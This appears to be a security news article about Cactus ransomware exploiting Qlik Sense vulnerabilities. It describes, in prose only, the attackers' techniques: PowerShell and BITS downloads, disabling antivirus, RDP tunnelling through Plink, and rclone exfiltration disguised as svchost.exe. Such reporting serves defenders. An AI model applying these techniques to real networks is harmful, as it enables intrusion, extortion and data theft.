Cactus Ransomware Targets Qlik Sense Vulnerabilities to Infiltrate Networks

November 30, 2023

The Cactus ransomware has reportedly been exploiting significant vulnerabilities in the Qlik Sense data analytics tool to gain initial foothold in corporate networks. Qlik Sense, a versatile platform that supports multiple data sources and aids in creating custom data reports or interactive visualizations, can operate both locally and in the cloud. In late August, the vendor issued security patches for two critical vulnerabilities that impacted the Windows version of the platform.

One of these vulnerabilities, identified as CVE-2023-41266, is a path traversal bug that could be exploited to create anonymous sessions and conduct HTTP requests to unauthorized endpoints. The other issue, labelled as CVE-2023-41265 and with a critical severity of 9.8, does not necessitate authentication and can be used to elevate privileges and execute HTTP requests on the backend server hosting the application.

On September 20, Qlik discovered that the fix for CVE-2023-41265 was inadequate and released a new update, tracking the issue as a separate vulnerability identified as CVE-2023-48365. Cybersecurity company Arctic Wolf has recently warned about Cactus ransomware actively exploiting these vulnerabilities on publicly-exposed Qlik Sense instances that are yet to be patched.

The Cactus ransomware attacks observed by Arctic Wolf exploit these security flaws to execute code that prompts the Qlik Sense Scheduler service to initiate new processes. The attackers employ PowerShell and the Background Intelligent Transfer Service (BITS) to download tools that establish persistence and provide remote access to the machine. Furthermore, the attackers execute multiple discovery commands with the output redirected into .TTF files, which Arctic Wolf researchers speculate is for obtaining command output via path traversal.

The threat actor also utilizes various methods to stay concealed and gather information, which includes uninstalling Sophos antivirus, changing the administrator password, and establishing an RDP tunnel using the Plink command-line connection tool. In the final stage of the attack, the hackers deployed the Cactus ransomware on the infiltrated systems.

Additional evidence gathered by Arctic Wolf’s analysts suggests that the threat actors used RDP to move laterally, WizTree to analyze disk space, and rclone (disguised as ‘svchost.exe’) to exfiltrate data. The use of these tools and techniques aligns with what researchers observed in previous Cactus ransomware attacks.

To mitigate the risks of a breach, Qlik advises upgrading to the latest versions of Sense Enterprise for Windows. Notably, Cactus ransomware surfaced in March this year and quickly adopted the double-extortion tactic, stealing data from victims before encrypting it on compromised systems. In previous attacks, they exploited Fortinet VPN flaws for initial network access. A report in May by Kroll highlighted the ransomware operation's unique use of encryption to shield the malware binary from detection by security products. The researchers also underscored the use of the AnyDesk remote desktop application, the rclone tool to send stolen data to cloud storage services, and the use of batch scripts to uninstall security products.

Latest News

• Rhysida Ransomware Group Targets King Edward VII’s Hospital in London
• BLUFFS Bluetooth Attacks Pose Major Threat: A Researcher's Study
• Unpatched Vulnerabilities Detected in Ray Open Source Framework for AI/ML
• Google Chrome Rolls Out Urgent Security Update to Address 6th Zero-Day Exploit in 2023
• Critical ownCloud Vulnerability Under Active Exploitation